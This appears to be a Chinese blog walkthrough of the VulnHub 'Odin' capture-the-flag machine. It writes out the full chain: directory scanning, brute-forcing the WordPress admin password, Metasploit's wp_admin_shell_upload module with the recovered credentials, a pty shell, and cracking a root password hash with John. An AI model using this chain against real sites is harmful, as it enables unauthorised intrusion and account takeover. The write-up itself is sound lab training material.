vulnhub--odin

描述

难度:容易

奥丁以乔格海姆(Vegtam)的行者的名义冒险前往约特海姆(Jötunheim)附近的米米尔(Mimir)井。守卫井的米米尔(Mimir)允许他从井里喝水,他要求他牺牲左眼,这是他获取知识的意愿的象征

请添加/ etc / hosts-> ip vm + odin

例如:192.168.1.1 odin

推特:@ArmBjorn

在Virtualbox中工作。

获取root权限

由于靶机中许多许多url使用了odin,没有动态获取,因此需要加一条本地dns

编辑C:\Windows\System32\drivers\etc\hosts

底部添加 IP地址 odin

目录

一、信息收集

1.nmap端口扫描:

2.dirsearch目录扫描:

二、漏洞探测&利用

1. burp爆破

2. getshell

1.过上传插件的方式将我们的一句话木马插入到根目录中

2 . metasploit反弹shell

四、提权

1.查询www下的配置文件wp-config.php

2.john解密

五、总结


 

一、信息收集

1.nmap端口扫描:

2.dirsearch目录扫描:

python3 dirsearch.py -u 192.168.155.132 -e php

 

找到后台目录,访问http://odin/wp-login.php

 

二、漏洞探测&利用

1. burp爆破

用户名admin密码不正确,burp爆破。

密码为:qwerty

 

登入后台管理。

2. getshell

1.过上传插件的方式将我们的一句话木马插入到根目录中

但是找不到文件的绝对路径。

2 . metasploit反弹shell

search wordpress shell  

搜索与wordpress 的payload

use exploit/unix/webapp/wp_admin_shell_upload

options

set password qwerty

set username admin

set rhost 192.168.155.132  #目标ip

run

shell

python3 -c "import pty;pty.spawn('/bin/bash')"

 

四、提权

1.查询www下的配置文件wp-config.php

 

2.john解密

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/

将密文保存到pass.txt

john pass.txt  && john --show pass.txt

解得:root/jasmine

3.su

su root

 

五、总结

  • 知道cms的管理员的账号密码,但很难利用上传点时,msf> use exploit/unix/webapp/wp_admin_shell_upload
  • john解密
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值